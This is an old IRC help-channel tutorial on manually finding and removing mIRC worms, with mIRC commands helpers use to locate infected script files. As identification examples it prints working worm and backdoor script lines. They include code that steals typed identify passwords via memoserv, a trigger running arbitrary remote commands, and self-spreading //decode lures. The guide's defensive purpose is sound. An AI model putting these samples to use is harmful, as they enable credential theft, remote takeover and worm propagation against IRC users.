TrojanInfo.com

************************************************************************* *************************************************************************

First some basic mIRC commands that will help you:

-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-
$script()

Returns the filename for the Nth loaded script file. If you specify a filename, it returns $null if the file isn't loaded.

$script(0) return the number of script files loaded $script(2) returns the filename of the 2nd loaded script file $script(moo.txt) returns $null if the file isn't loaded, or moo.txt if it is.

-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-
$findfile(dir,wildcard,N)

Searches the specified directory and its subdirectories for the Nth filename matching the wildcard file specification and returns the full path and filename if it is found.

-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-
$exists(filename) Returns $true if a file exists and $false if it doesn't.

$exists(c:\mirc\mirc.exe) returns $true or $false.

-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-
/play [channel/nick/stop] [delay] This is a powerful command that allows you to send text files, or parts of them, to a user or a channel.

The delay is in milliseconds. If you play files too quickly to a server you will probably be disconnected for flooding. The default setting is 1000 ie. 1 second. Empty lines between text are treated as a delay.

/play c:\text\mypoem.txt 1500

The -t switch forces mIRC to look up the specified topic in the file and play all lines under that topic. For example:

/play -trfiles c:\help.txt

To stop the playing of a text file and clear the queue you can use /play stop.

-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-
$read and $readn Reads a line from a file and inserts it into the current position in an alias command. The format is:

$read [-ntl# -swtext]

************************************************************************* *************************************************************************
How do we use these commands?

The most common types of viruses on IRC are the mIRC worms. Two main strains that have several variants of them. The //decode ones and the server.ini ones. This tutorial will not go into detail about the server.ini ones as it could have a whole class for the information on it.

Below is the way the above commands are used, these commands would be used during the removal of basic mIRC worms.

//say $script(0) - This establishes how many scripts the user has loaded //say $script(1) - Says the name of the script loaded - this step maybe repeated for each file they have loaded as indicated by $script(0) //!remove Filename - Deletes the file from the users machine //!unload -rs Filename - Unloads the remote file from the machine.

If a user has many files returned with a $script(0) ie more then 5, it is better to use the play command //!play -trfiles HELPERNICKHERE mirc.ini 2000 - Its important for the 2000 to be at the end or the user will Excess Flood and be discconected, when you have newbie users this will confuse them even more. So always use 2000 - This command will message you all the scripts they have loaded.

//say $findfile(c:,FILENAME,0) - Tells how many of a particular filename are located on the c:\ when removing virii like server.ini, it must be removed from all mIRCs if a user has 5 mIRCs installed you will need to find all the server.ini's.

//say $findfile(c:,server.ini,2) - Well return the 2nd server.ini on the c:\, if there isnt one it will return an error to the user and display no output.

************************************************************************* *************************************************************************
How do we know when to use these commands

Normally a user will enter the channel and know they have some sort of virus, or have been set to get help with a virus. Below are the steps that should be taken for mIRC worms.

1. Cycle the channel and look for any auto messages 2. If an automessage is given and is spamming a website then its likely its a mIRC worm. 3. Find the file that has the virus script in it using //say $script(0) 4. If scripts > 5 then use //!play otherwise use //say $script(1) .... 5. Once the file is located remove it and unload it. 6. depending on the type of file more steps may need to be taken

************************************************************************* *************************************************************************
How do we know whats a virus file

Usually the name of the file gives it away as previous ops have noticed trends in virus names.

Common names for the //Decode include - nkie.txt m|rc32.ini twg.txt and many others, Most of the website spamming worms are server.ini or script.ini

Note with script.ini this is the default name for mIRC scripts. So you should check if it is really a worm before getting a user to delete. To do this use

/dcc send HELPNICKHERE filehere

or /play HELPNICKHERE filehere 2000 (NEVER forget the 2000 or they will excess flood)

So whats a virus file look like, here are some examples

Pr.ini (this is a backdoor script similar to many server.ini) n2=on *:INPUT:*: { haltdef | /echo -a < $+ $me $+ > $1- | msg %chan --Warning- (Input command) $1- | /clearall | //run temp2.exe /n /fh | halt }

script.ini (a Lame backdoor script) n29=on *:input:*:{ if (identify isin $1-) { if (dalnet == $network) { .ignore memoserv | .memoserv send war_man $1- | .timer 1 30 /.ignore -r memoserv } } }

(A weird ASCII file using one of these //decode worms) on *:join:#:.timer 1 30 if ( $nick !isop $chan ) .msg $nick Type This to Hack Someone!:12 //$ $+ decode( $encode(write $read($script,n,1),m) ,m) $ $+ chr(124) $ $ $+ + decode( $encode(.load -rs ,m) ,m)

I cant remeber the filename but on ^*:text:@@*:*:haltdef | $2- This command allows the attack to execute any command on the infected machine

in.txt ctcp *:N:*:{ . $+ $2- | halt }

twg.txt

on *:text:!list:#: notice $nick 7[4Fserve7] Trigger:[4//.write $ $+ decode( $encode(twg.txt $read($script,n,1),m) ,m) $chr(124) $ $+ decode( $encode(/.load -rs twg.txt,m) ,m) 7] Note7[4DVD RIPS!!7]

************************************************************************* *************************************************************************
What about other viruses?

These above commands used in combination can remove 80% of mIRC viruses, if you read the virused file and remove any files in the scripting.

When a user is sending DCC files again you can use this to locate the virus script, but there are specific removers as some send through outlook as well so all files need to be removed.

************************************************************************* *************************************************************************
Where to now?

I suggest you practice using these commands, save just the commands to a seperate .txt file and use them for reference when helping users. When ever you find a user is infected get a copy of their virus, and read the scripting this will help you understand how they work and things to look for next time.

Eventually you will have enough experience to recongise the virus file name just from the users auto message, or to be able to locate the source of a virus by the users symtoms.

EOF.

This is just a brief introduction on the tools we used when manually removing viruses, currently im compiling information aobut how to remove a range of viruses by automatic removal / manual and / mIRC so I will have these available in the future.

Any questions please contact me on IRC.DAL.NET in either #Help, #Nohack or #IRCSecure

Moby